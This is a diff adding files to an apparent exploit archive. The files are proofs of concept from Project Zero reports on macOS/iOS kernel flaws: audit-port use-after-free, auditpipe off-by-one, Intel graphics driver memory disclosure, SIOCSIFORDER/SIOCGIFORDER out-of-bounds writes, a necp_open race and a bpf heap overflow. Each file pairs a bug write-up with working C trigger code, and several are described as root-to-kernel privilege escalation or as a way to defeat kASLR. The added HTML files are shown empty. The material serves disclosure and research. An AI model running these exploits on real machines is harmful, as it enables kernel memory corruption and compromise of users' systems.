PSPA_EXCEPTION, PSPA_AU_SESSION and PSPA_IMP_WATCHPORTS) + +For the special, exception and audit ports it tries to update the new task to reflect the port action +by calling either task_set_special_port, task_set_exception_ports or audit_session_spawnjoin and if +any of those calls fail it calls ipc_port_release_send(port). + +task_set_special_port and task_set_exception_ports don't drop a reference on the port if they fail +but audit_session_spawnjoin (which calls to audit_session_join_internal) *does* drop a reference on +the port on failure. It's easy to make audit_session_spawnjoin fail by specifying a port which isn't +an audit session port. + +This means we can cause two references to be dropped on the port when only one is held leading to a +use after free in the kernel. + +Tested on MacOS 10.12.3 (16D32) on MacBookAir5,2 +#endif + +#include +#include +#include + +#include + +int main() { + + mach_port_t p = MACH_PORT_NULL; + mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p); + mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND); + + posix_spawnattr_t attrs; + posix_spawnattr_init(&attrs); + posix_spawnattr_setauditsessionport_np(&attrs,p); + + char* _argv[] = {"/usr/bin/id", NULL}; + int child_pid = 0; + int spawn_err = posix_spawn(&child_pid, + "/usr/bin/id", + NULL, // file actions + &attrs, + _argv, + NULL); +} diff --git a/platforms/macos/dos/41797.c b/platforms/macos/dos/41797.c new file mode 100755 index 000000000..a8a125c76 --- /dev/null +++ b/platforms/macos/dos/41797.c @@ -0,0 +1,212 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1126 + +MacOS kernel memory corruption due to off-by-one in audit_pipe_open + +audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) + +Here's the code: + + static int + audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype, + __unused proc_t p) + { + struct audit_pipe *ap; + int u; + + u = minor(dev); + if (u < 0 || u > MAX_AUDIT_PIPES) + return (ENXIO); + + AUDIT_PIPE_LIST_WLOCK(); + ap = audit_pipe_dtab[u]; + if (ap == NULL) { + ap = audit_pipe_alloc(); + if (ap == NULL) { + AUDIT_PIPE_LIST_WUNLOCK(); + return (ENOMEM); + } + audit_pipe_dtab[u] = ap; + + +We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: + + static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES]; + +There's an off-by-one in the minor number bounds check + (u < 0 || u > MAX_AUDIT_PIPES) +should be + (u < 0 || u >= MAX_AUDIT_PIPES) + +The other special file operation handlers assume that the minor number of an opened device +is correct therefore it isn't validated for example in the ioctl handler: + + static int + audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, + __unused int flag, __unused proc_t p) + { + ... + ap = audit_pipe_dtab[minor(dev)]; + KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); + ... + switch (cmd) { + case FIONBIO: + AUDIT_PIPE_LOCK(ap); + if (*(int *)data) + +Directly after the audit_pipe_dtab array in the bss is this global variable: + + static u_int64_t audit_pipe_drops; + +audit_pipe_drops will be incremented each time an audit message enqueue fails: + + if (ap->ap_qlen >= ap->ap_qlimit) { + ap->ap_drops++; + audit_pipe_drops++; + return; + } + +So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the +struct audit_pipe* which is read out-of-bounds. + +For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file +and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record +and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* +then the ioctl will try to use that pointer. + +This is a root to kernel privesc. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +*/ + +//ianbeer +#if 0 +MacOS kernel memory corruption due to off-by-one in audit_pipe_open + +audit_pipe_open is the special file open handler for the auditpipe device (major number 10.) + +Here's the code: + + static int + audit_pipe_open(dev_t dev, __unused int flags, __unused int devtype, + __unused proc_t p) + { + struct audit_pipe *ap; + int u; + + u = minor(dev); + if (u < 0 || u > MAX_AUDIT_PIPES) + return (ENXIO); + + AUDIT_PIPE_LIST_WLOCK(); + ap = audit_pipe_dtab[u]; + if (ap == NULL) { + ap = audit_pipe_alloc(); + if (ap == NULL) { + AUDIT_PIPE_LIST_WUNLOCK(); + return (ENOMEM); + } + audit_pipe_dtab[u] = ap; + + +We can control the minor number via mknod. Here's the definition of audit_pipe_dtab: + + static struct audit_pipe *audit_pipe_dtab[MAX_AUDIT_PIPES]; + +There's an off-by-one in the minor number bounds check + (u < 0 || u > MAX_AUDIT_PIPES) +should be + (u < 0 || u >= MAX_AUDIT_PIPES) + +The other special file operation handlers assume that the minor number of an opened device +is correct therefore it isn't validated for example in the ioctl handler: + + static int + audit_pipe_ioctl(dev_t dev, u_long cmd, caddr_t data, + __unused int flag, __unused proc_t p) + { + ... + ap = audit_pipe_dtab[minor(dev)]; + KASSERT(ap != NULL, ("audit_pipe_ioctl: ap == NULL")); + ... + switch (cmd) { + case FIONBIO: + AUDIT_PIPE_LOCK(ap); + if (*(int *)data) + +Directly after the audit_pipe_dtab array in the bss is this global variable: + + static u_int64_t audit_pipe_drops; + +audit_pipe_drops will be incremented each time an audit message enqueue fails: + + if (ap->ap_qlen >= ap->ap_qlimit) { + ap->ap_drops++; + audit_pipe_drops++; + return; + } + +So by setting a small ap_qlimit via the AUDITPIPE_SET_QLIMIT ioctl we can increment the +struct audit_pipe* which is read out-of-bounds. + +For this PoC I mknod a /dev/auditpipe with the minor number 32, create a new log file +and enable auditing. I then set the QLIMIT to 1 and alternately enqueue a new audit record +and call and ioctl. Each time the enqueue fails it will increment the struct audit_pipe* +then the ioctl will try to use that pointer. + +This is a root to kernel privesc. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char** argv) { + system("rm -rf /dev/auditpipe"); + system("mknod /dev/auditpipe c 10 32"); + + int fd = open("/dev/auditpipe", O_RDWR); + + if (fd == -1) { + perror("failed to open auditpipe device\n"); + exit(EXIT_FAILURE); + } + printf("opened device\n"); + + system("touch a_log_file"); + int auditerr = auditctl("a_log_file"); + if (auditerr == -1) { + perror("failed to set a new log file\n"); + } + + uint32_t qlim = 1; + int err = ioctl(fd, AUDITPIPE_SET_QLIMIT, &qlim); + if (err == -1) { + perror("AUDITPIPE_SET_QLIMIT"); + exit(EXIT_FAILURE); + } + + while(1) { + char* audit_data = "\x74hello"; + int audit_len = strlen(audit_data)+1; + audit(audit_data, audit_len); + uint32_t nread = 0; + int err = ioctl(fd, FIONREAD, &qlim); + if (err == -1) { + perror("FIONREAD"); + exit(EXIT_FAILURE); + } + } + + return 0; +} diff --git a/platforms/macos/dos/41798.c b/platforms/macos/dos/41798.c new file mode 100755 index 000000000..3703317df --- /dev/null +++ b/platforms/macos/dos/41798.c @@ -0,0 +1,138 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1069 + +MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability + +Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability. + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *) +__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace +__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace +... +__text:000000000002A3B8 mov eax, [rbx] ; read dword +__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object +__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0 +__text:000000000002A3C9 jz short ___fail +__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh +__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes +__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace +__text:000000000002A3DA call _memcpy + +For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable +pointer there which will allow us to read back vtable contents and defeat kASLR. + +With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target +then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext +HMAC key and forge sandbox extensions if it still works like that. + +tested on MacOS Sierra 10.12.2 (16C67) +*/ + +// ianbeer + +// build: clang -o capri_mem capri_mem.c -framework IOKit + +#if 0 +MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability + +Selector 0x710 of IntelFBClientControl ends up in AppleIntelCapriController::getDisplayPipeCapability. + +This method takes a structure input and output buffer. It reads an attacker controlled dword from the input buffer which it +uses to index an array of pointers with no bounds checking: + +AppleIntelCapriController::getDisplayPipeCapability(AGDCFBGetDisplayCapability_t *, AGDCFBGetDisplayCapability_t *) +__text:000000000002A3AB mov r14, rdx ; output buffer, readable from userspace +__text:000000000002A3AE mov rbx, rsi ; input buffer, controlled from userspace +... +__text:000000000002A3B8 mov eax, [rbx] ; read dword +__text:000000000002A3BA mov rsi, [rdi+rax*8+0E40h] ; use as index for small inline buffer in this object +__text:000000000002A3C2 cmp byte ptr [rsi+1DCh], 0 ; fail if byte at +0x1dc is 0 +__text:000000000002A3C9 jz short ___fail +__text:000000000002A3CB add rsi, 1E0Dh ; otherwise, memcpy from that pointer +0x1e0dh +__text:000000000002A3D2 mov edx, 1D8h ; 0x1d8 bytes +__text:000000000002A3D7 mov rdi, r14 ; to the buffer which will be sent back to userspace +__text:000000000002A3DA call _memcpy + +For this PoC we try to read the pointers at 0x2000 byte boundaries after this allocation; with luck there will be a vtable +pointer there which will allow us to read back vtable contents and defeat kASLR. + +With a bit more effort this could be turned into an (almost) arbitrary read by for example spraying the kernel heap with the desired read target +then using a larger offset hoping to land in one of the sprayed buffers. A kernel arbitrary read would, for example, allow you to read the sandbox.kext +HMAC key and forge sandbox extensions if it still works like that. + +tested on MacOS Sierra 10.12.2 (16C67) +#endif + +#include +#include +#include + +#include + +#include + +int main(int argc, char** argv){ + kern_return_t err; + + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl")); + + if (service == IO_OBJECT_NULL){ + printf("unable to find service\n"); + return 0; + } + + io_connect_t conn = MACH_PORT_NULL; + err = IOServiceOpen(service, mach_task_self(), 0, &conn); + if (err != KERN_SUCCESS){ + printf("unable to get user client connection\n"); + return 0; + } + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 4096; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0x1d8; + + for (int step = 1; step < 1000; step++) { + memset(inputStruct, 0, inputStructCnt); + *(uint32_t*)inputStruct = 0x238 + (step*(0x2000/8)); + + outputStructCnt = 4096; + memset(outputStruct, 0, outputStructCnt); + + err = IOConnectCallMethod( + conn, + 0x710, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err == KERN_SUCCESS) { + break; + } + + printf("retrying 0x2000 up - %s\n", mach_error_string(err)); + } + + uint64_t* leaked = (uint64_t*)(outputStruct+3); + for (int i = 0; i < 0x1d8/8; i++) { + printf("%016llx\n", leaked[i]); + } + + return 0; +} diff --git a/platforms/multiple/dos/41792.c b/platforms/multiple/dos/41792.c new file mode 100755 index 000000000..1b9889bc7 --- /dev/null +++ b/platforms/multiple/dos/41792.c @@ -0,0 +1,113 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1108 + +SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox. + +it falls through to calling: + ifnet_reset_order(ordered_indices, ifo->ifo_count) +where ordered_indicies points to attacker-controlled bytes. + +ifnet_reset_order contains this code: + + for (u_int32_t order_index = 0; order_index < count; order_index++) { + u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a) + if (interface_index == IFSCOPE_NONE || + (int)interface_index > if_index) { <-------------------------- (b) + break; + } + ifp = ifindex2ifnet[interface_index]; <-------------------------- (c) + if (ifp == NULL) { + continue; + } + ifnet_lock_exclusive(ifp); + TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d) + ifnet_lock_done(ifp); + if_ordered_count++; + } + +at (a) a controlled 32-bit value is read into an unsigned 32-bit variable. +at (b) this value is cast to a signed type for a bounds check +at (c) this value is used as an unsigned index + +by providing a value with the most-significant bit set making it negative when cast to a signed type +we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds +below the ifindex2ifnet array. + +This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 + +(on 64-bit platforms the array index wouldn't wrap around so the read would actually occur > 2GB above the array, not below) +*/ + +// ianbeer +#if 0 +MacOS/iOS kernel memory corruption due to Bad bounds checking in SIOCSIFORDER socket ioctl + +SIOCSIFORDER is a new ioctl added in iOS 10. It can be called on a regular tcp socket, so from pretty much any sandbox. + +it falls through to calling: + ifnet_reset_order(ordered_indices, ifo->ifo_count) +where ordered_indicies points to attacker-controlled bytes. + +ifnet_reset_order contains this code: + + for (u_int32_t order_index = 0; order_index < count; order_index++) { + u_int32_t interface_index = ordered_indices[order_index]; <---------------- (a) + if (interface_index == IFSCOPE_NONE || + (int)interface_index > if_index) { <-------------------------- (b) + break; + } + ifp = ifindex2ifnet[interface_index]; <-------------------------- (c) + if (ifp == NULL) { + continue; + } + ifnet_lock_exclusive(ifp); + TAILQ_INSERT_TAIL(&ifnet_ordered_head, ifp, if_ordered_link); <---------- (d) + ifnet_lock_done(ifp); + if_ordered_count++; + } + +at (a) a controlled 32-bit value is read into an unsigned 32-bit variable. +at (b) this value is cast to a signed type for a bounds check +at (c) this value is used as an unsigned index + +by providing a value with the most-significant bit set making it negative when cast to a signed type +we can pass the bounds check at (b) and lead to reading an interface pointer out-of-bounds +below the ifindex2ifnet array. + +This leads very directly to memory corruption at (d) which will add the value read out of bounds to a list structure. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include + +#include +#include + +#include + +struct if_order { + u_int32_t ifo_count; + u_int32_t ifo_reserved; + mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */ +}; + +#define SIOCSIFORDER _IOWR('i', 178, struct if_order) + +int main() { + uint32_t data[] = {0x80001234}; + + struct if_order ifo; + ifo.ifo_count = 1; + ifo.ifo_reserved = 0; + ifo.ifo_ordered_indices = (mach_vm_address_t)data; + + int fd = socket(PF_INET, SOCK_STREAM, 0); + int ret = ioctl(fd, SIOCSIFORDER, &ifo); + + return 0; +} diff --git a/platforms/multiple/dos/41793.c b/platforms/multiple/dos/41793.c new file mode 100755 index 000000000..64243e67f --- /dev/null +++ b/platforms/multiple/dos/41793.c @@ -0,0 +1,185 @@ +/* + +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1111 + +SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the +ifnet_ordered_head linked list of interfaces. + +SIOCSIFORDER clears the existing list and allows userspace to specify an array of +interface indexes used to build a new list. + +SIOCGIFORDER allow userspace to query the list of interface identifiers used to build +that list. + +Here's the relevant code for SIOCGIFORDER: + + case SIOCGIFORDER: { /* struct if_order */ + struct if_order *ifo = (struct if_order *)(void *)data; + + u_int32_t ordered_count = if_ordered_count; <----------------- (a) + + if (ifo->ifo_count == 0 || + ordered_count == 0) { + ifo->ifo_count = ordered_count; + } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) { + u_int32_t count_to_copy = + MIN(ordered_count, ifo->ifo_count); <---------------- (b) + size_t length = (count_to_copy * sizeof(u_int32_t)); + struct ifnet *ifp = NULL; + u_int32_t cursor = 0; + + ordered_indices = _MALLOC(length, M_NECP, M_WAITOK); + if (ordered_indices == NULL) { + error = ENOMEM; + break; + } + + ifnet_head_lock_shared(); + TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) { + if (cursor > count_to_copy) { <------------------ (c) + break; + } + ordered_indices[cursor] = ifp->if_index; <------------------ (d) + cursor++; + } + ifnet_head_done(); + + +at (a) it reads the actual length of the list (of course it should take the lock here too, +but that's not the bug I'm reporting) + +at (b) it computes the number of entries it wants to copy as the minimum of the requested number +and the actual number of entries in the list + +the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that +the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of +elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen! + +By requesting one fewer entries than are actually in the list the code will always write one interface index +entry one off the end of the ordered_indices array. + +This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries +then writes 5 entries into there. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +*/ + +// ianbeer +// add gzalloc_size=16 to boot args to see the actual OOB write more easily +#if 0 +MacOS/iOS kernel memory corruption due to off-by-one in SIOCGIFORDER socket ioctl + +SIOCSIFORDER and SIOCGIFORDER allow userspace programs to build and maintain the +ifnet_ordered_head linked list of interfaces. + +SIOCSIFORDER clears the existing list and allows userspace to specify an array of +interface indexes used to build a new list. + +SIOCGIFORDER allow userspace to query the list of interface identifiers used to build +that list. + +Here's the relevant code for SIOCGIFORDER: + + case SIOCGIFORDER: { /* struct if_order */ + struct if_order *ifo = (struct if_order *)(void *)data; + + u_int32_t ordered_count = if_ordered_count; <----------------- (a) + + if (ifo->ifo_count == 0 || + ordered_count == 0) { + ifo->ifo_count = ordered_count; + } else if (ifo->ifo_ordered_indices != USER_ADDR_NULL) { + u_int32_t count_to_copy = + MIN(ordered_count, ifo->ifo_count); <---------------- (b) + size_t length = (count_to_copy * sizeof(u_int32_t)); + struct ifnet *ifp = NULL; + u_int32_t cursor = 0; + + ordered_indices = _MALLOC(length, M_NECP, M_WAITOK); + if (ordered_indices == NULL) { + error = ENOMEM; + break; + } + + ifnet_head_lock_shared(); + TAILQ_FOREACH(ifp, &ifnet_ordered_head, if_ordered_link) { + if (cursor > count_to_copy) { <------------------ (c) + break; + } + ordered_indices[cursor] = ifp->if_index; <------------------ (d) + cursor++; + } + ifnet_head_done(); + + +at (a) it reads the actual length of the list (of course it should take the lock here too, +but that's not the bug I'm reporting) + +at (b) it computes the number of entries it wants to copy as the minimum of the requested number +and the actual number of entries in the list + +the loop at (c) iterates through the list of all entries and the check at (c) is supposed to check that +the write at (d) won't go out of bounds, but it should be a >=, not a >, as cursor is the number of +elements *already* written. If count_to_copy is 0, and cursor is 0 the write will still happen! + +By requesting one fewer entries than are actually in the list the code will always write one interface index +entry one off the end of the ordered_indices array. + +This poc makes a list with 5 entries then requests 4. This allocates a 16-byte kernel buffer to hold the 4 entries +then writes 5 entries into there. + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include + +#include +#include + +#include + +struct if_order { + u_int32_t ifo_count; + u_int32_t ifo_reserved; + mach_vm_address_t ifo_ordered_indices; /* array of u_int32_t */ +}; + +#define SIOCSIFORDER _IOWR('i', 178, struct if_order) +#define SIOCGIFORDER _IOWR('i', 179, struct if_order) + +void set(int fd, uint32_t n) { + uint32_t* data = malloc(n*4); + for (int i = 0; i < n; i++) { + data[i] = 1; + } + + struct if_order ifo; + ifo.ifo_count = n; + ifo.ifo_reserved = 0; + ifo.ifo_ordered_indices = (mach_vm_address_t)data; + + ioctl(fd, SIOCSIFORDER, &ifo); + free(data); +} + +void get(int fd, uint32_t n) { + uint32_t* data = malloc(n*4); + memset(data, 0, n*4); + + struct if_order ifo; + ifo.ifo_count = n; + ifo.ifo_reserved = 0; + ifo.ifo_ordered_indices = (mach_vm_address_t)data; + + ioctl(fd, SIOCGIFORDER, &ifo); + free(data); +} + +int main() { + int fd = socket(PF_INET, SOCK_STREAM, 0); + set(fd, 5); + get(fd, 4); + return 0; +} diff --git a/platforms/multiple/dos/41794.c b/platforms/multiple/dos/41794.c new file mode 100755 index 000000000..10d5e8474 --- /dev/null +++ b/platforms/multiple/dos/41794.c @@ -0,0 +1,146 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116 + +necp_open is a syscall used to obtain a new necp file descriptor + +The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap. + +Here's the relevant code from necp_open: + + error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a) + if (error != 0) { + goto done; + } + + if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP, + M_WAITOK | M_ZERO)) == NULL) { + error = ENOMEM; + goto done; + } + + fd_data->flags = uap->flags; + LIST_INIT(&fd_data->clients); + lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr); + klist_init(&fd_data->si.si_note); + fd_data->proc_pid = proc_pid(p); + + fp->f_fglob->fg_flag = FREAD; + fp->f_fglob->fg_ops = &necp_fd_ops; + fp->f_fglob->fg_data = fd_data; <-------------------------- (b) + + proc_fdlock(p); + + *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE); + procfdtbl_releasefd(p, fd, NULL); + fp_drop(p, fd, fp, 1); + proc_fdunlock(p); <--------------------- (c) + + *retval = fd; + + lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d) + LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e) + lck_rw_done(&necp_fd_lock); + +at (a) a new file descriptor and file object is allocated for the calling process +at (b) that new file's fg_data is set to the fd_data heap allocation +at (c) the process fd table is unlocked meaning that other processes can now look up + the new fd and get the associated fp + +at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list + +The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c) +another thread can call close on the new fd which will free fd_data before we enqueue it at (e). + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 + +in: "...that other processes can now look up the new fd and get the associated fp..." I meant threads, not processes! + +*/ + +// ianbeer +#if 0 +MacOS/iOS kernel uaf due to bad locking in necp_open + +necp_open is a syscall used to obtain a new necp file descriptor + +The necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap. + +Here's the relevant code from necp_open: + + error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a) + if (error != 0) { + goto done; + } + + if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP, + M_WAITOK | M_ZERO)) == NULL) { + error = ENOMEM; + goto done; + } + + fd_data->flags = uap->flags; + LIST_INIT(&fd_data->clients); + lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr); + klist_init(&fd_data->si.si_note); + fd_data->proc_pid = proc_pid(p); + + fp->f_fglob->fg_flag = FREAD; + fp->f_fglob->fg_ops = &necp_fd_ops; + fp->f_fglob->fg_data = fd_data; <-------------------------- (b) + + proc_fdlock(p); + + *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE); + procfdtbl_releasefd(p, fd, NULL); + fp_drop(p, fd, fp, 1); + proc_fdunlock(p); <--------------------- (c) + + *retval = fd; + + lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d) + LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e) + lck_rw_done(&necp_fd_lock); + +at (a) a new file descriptor and file object is allocated for the calling process +at (b) that new file's fg_data is set to the fd_data heap allocation +at (c) the process fd table is unlocked meaning that other processes can now look up + the new fd and get the associated fp + +at (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list + +The bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c) +another thread can call close on the new fd which will free fd_data before we enqueue it at (e). + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include +#include + +#include + +int necp_open(int flags) { + return syscall(SYS_necp_open, flags); +} + +void* closer(void* arg) { + while(1) { + close(3); + } +} + +int main() { + for (int i = 0; i < 10; i++) { + pthread_t t; + pthread_create(&t, NULL, closer, NULL); + } + + while (1) { + int fd = necp_open(0); + close(fd); + } + + return 0; +} diff --git a/platforms/multiple/dos/41796.c b/platforms/multiple/dos/41796.c new file mode 100755 index 000000000..70f5291d4 --- /dev/null +++ b/platforms/multiple/dos/41796.c @@ -0,0 +1,166 @@ +/* +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1125 + +The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length: + + case BIOCSBLEN: /* u_int */ + if (d->bd_bif != 0) + error = EINVAL; + else { + u_int size; + + bcopy(addr, &size, sizeof (size)); + + if (size > bpf_maxbufsize) + size = bpf_maxbufsize; + else if (size < BPF_MINBUFSIZE) + size = BPF_MINBUFSIZE; + bcopy(&size, addr, sizeof (size)); + d->bd_bufsize = size; + } + break; + + +d->bd_bif is set to the currently attached interface, so we can't change the length if we're already +attached to an interface. + +There's no ioctl command to detach us from an interface, but we can just destroy the interface +(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger +length which will set d->bd_bufsize to a new, larger value. + +If we then attach to an interface again we hit this code in bpf_setif: + + if (d->bd_sbuf == 0) { + error = bpf_allocbufs(d); + if (error != 0) + return (error); + +This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the +old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size +leading to heap corruption when packets are receive on the target interface. + +This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys +the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our +bpf device.) + +We then set a large buffer size and attach to the loopback interface and sent some large ping packets. + +This bug is a root -> kernel priv esc + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +*/ + +//ianbeer +#if 0 +MacOS/iOS kernel heap overflow in bpf + +The bpf ioctl BIOCSBLEN allows userspace to set the bpf buffer length: + + case BIOCSBLEN: /* u_int */ + if (d->bd_bif != 0) + error = EINVAL; + else { + u_int size; + + bcopy(addr, &size, sizeof (size)); + + if (size > bpf_maxbufsize) + size = bpf_maxbufsize; + else if (size < BPF_MINBUFSIZE) + size = BPF_MINBUFSIZE; + bcopy(&size, addr, sizeof (size)); + d->bd_bufsize = size; + } + break; + + +d->bd_bif is set to the currently attached interface, so we can't change the length if we're already +attached to an interface. + +There's no ioctl command to detach us from an interface, but we can just destroy the interface +(by for example attaching to a bridge interface.) We can then call BIOCSBLEN again with a larger +length which will set d->bd_bufsize to a new, larger value. + +If we then attach to an interface again we hit this code in bpf_setif: + + if (d->bd_sbuf == 0) { + error = bpf_allocbufs(d); + if (error != 0) + return (error); + +This means that the buffers actually won't be reallocated since d->bd_sbuf will still point to the +old buffer. This means that d->bd_bufsize is out of sync with the actual allocated buffer size +leading to heap corruption when packets are receive on the target interface. + +This PoC sets a small buffer length then creates and attaches to a bridge interface. It then destroys +the bridge interface (which causes bpfdetach to be called on that interface, clearing d->bd_bif for our +bpf device.) + +We then set a large buffer size and attach to the loopback interface and sent some large ping packets. + +This bug is a root -> kernel priv esc + +tested on MacOS 10.12.3 (16D32) on MacbookAir5,2 +#endif + +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char** argv) { + int fd = open("/dev/bpf3", O_RDWR); + if (fd == -1) { + perror("failed to open bpf device\n"); + exit(EXIT_FAILURE); + } + + // first set a small length: + int len = 64; + int err = ioctl(fd, BIOCSBLEN, &len); + if (err == -1) { + perror("setting small buffer length"); + exit(EXIT_FAILURE); + } + + // create an interface which we can destroy later: + system("ifconfig bridge7 create"); + + // connect the bpf device to that interface, allocating the buffer + struct ifreq ifr; + strcpy(ifr.ifr_name, "bridge7"); + err = ioctl(fd, BIOCSETIF, &ifr); + if (err == -1) { + perror("attaching to interface"); + exit(EXIT_FAILURE); + } + + // remove that interface, detaching us: + system("ifconfig bridge7 destroy"); + + // set a large buffer size: + len = 4096; + err = ioctl(fd, BIOCSBLEN, &len); + if (err == -1) { + perror("setting large buffer length"); + exit(EXIT_FAILURE); + } + + // connect to a legit interface with traffic: + strcpy(ifr.ifr_name, "lo0"); + err = ioctl(fd, BIOCSETIF, &ifr); + if (err == -1) { + perror("attaching to interface"); + exit(EXIT_FAILURE); + } + + // wait for a packet... + system("ping localhost -s 1400"); + + return 0; +} diff --git a/platforms/multiple/dos/41807.html b/platforms/multiple/dos/41807.html new file mode 100755 index 000000000..69f2fcac8 --- /dev/null +++ b/platforms/multiple/dos/41807.html @@ -0,0 +1,222 @@ + + + + + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41809.html b/platforms/multiple/dos/41809.html new file mode 100755 index 000000000..c8f911950 --- /dev/null +++ b/platforms/multiple/dos/41809.html @@ -0,0 +1,175 @@ + + + + + +

+
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41810.html b/platforms/multiple/dos/41810.html new file mode 100755 index 000000000..813abfb60 --- /dev/null +++ b/platforms/multiple/dos/41810.html @@ -0,0 +1,137 @@ + + + + +
+ + +
+
+
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41811.html b/platforms/multiple/dos/41811.html new file mode 100755 index 000000000..43dd22078 --- /dev/null +++ b/platforms/multiple/dos/41811.html @@ -0,0 +1,195 @@ + + + + +
+ +a + + + \ No newline at end of file diff --git a/platforms/multiple/dos/41812.html b/platforms/multiple/dos/41812.html new file mode 100755 index 000000000..e68fedd4f --- /dev/null +++ b/platforms/multiple/dos/41812.html @@ -0,0 +1,170 @@ + + + + +
+
foo
+ + \ No newline at end of file diff --git a/platforms/multiple/dos/41813.html b/platforms/multiple/dos/41813.html new file mode 100755 index 000000000..caeae44ff --- /dev/null +++ b/platforms/multiple/dos/41813.html @@ -0,0 +1,192 @@ + + + + + +
+ + + + +
foo
+
